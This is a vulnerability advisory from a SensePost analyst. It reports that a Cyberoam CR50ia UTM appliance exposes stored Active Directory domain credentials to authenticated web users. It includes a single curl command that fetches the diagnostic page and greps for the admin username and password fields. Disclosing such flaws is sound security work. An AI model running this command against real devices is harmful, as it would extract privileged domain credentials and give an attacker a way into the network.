Cyberoam Unified Threat Management: Insecure Password Handling

Hi,

Please find below the details of a vulnerability I discovered in
Cyberoam UTM device. The Vendor was notified, however I did not
receive any response from Vendor despite repeated email reminders.

SECURITY ADVISORY: cyberoam-utm-insecure-password-handling

Affected Software: Cyberoam CR50ia 10.01.0 build 678
Vulnerability: Insecure Password Handling
Severity: High
Release Date: Unreleased

I. Background

"Cyberoam Unified Threat Management appliances offer assured security,
connectivity and productivity to Small Office-Home Office (SOHO) and
Remote Office-Branch Office (ROBO) users by allowing user
identity-based policy controls."

Cyberoam UTM integrates with Active Directory. In order to query data
from a configured AD, domain credentials are stored within the device.
These credentials are retrievable by an authenticated user.


II. Description

Domain credentials are stored on the device and passed to web
clientson a diagnostic page (Identity –> Authentication –>
Authentication Server –> /Select Configured AD/ ). Authenticated
clients can thus easily access stored credentials.

A trivial check for this follows (replace cookie value):

curl -s -b "JSESSIONID=u2ur76lhy4qt" -H "Referer: blah"
"http://<webserver>/corporate/webpages/identity/ActiveDirectoryEdit.jsp?__RequestType=ajax&&objectID=1&pageid=pagePopupForm1"|egrep
'(adminusername|passwdvalue)'

III. Impact

The vulnerability allows a malicious user to access potentially
privileged domain credentials. Should default passwords not be
changed, then this is a trivial entry point onto a Windows domain.


IV. Remediation

Do not return stored credentials to the browser.

V. Disclosure

Reported By: Saurabh Harit, Senior Security Analyst, SensePost

Discovery Date:         2011-11-01


VI. References

[1] http://www.cyberoamworks.com/Cyberoam-CR50ia.asp

Thanks & Regards,

Saurabh Harit
Senior Security Analyst
SensePost Pvt Ltd
Phone: +27 768006821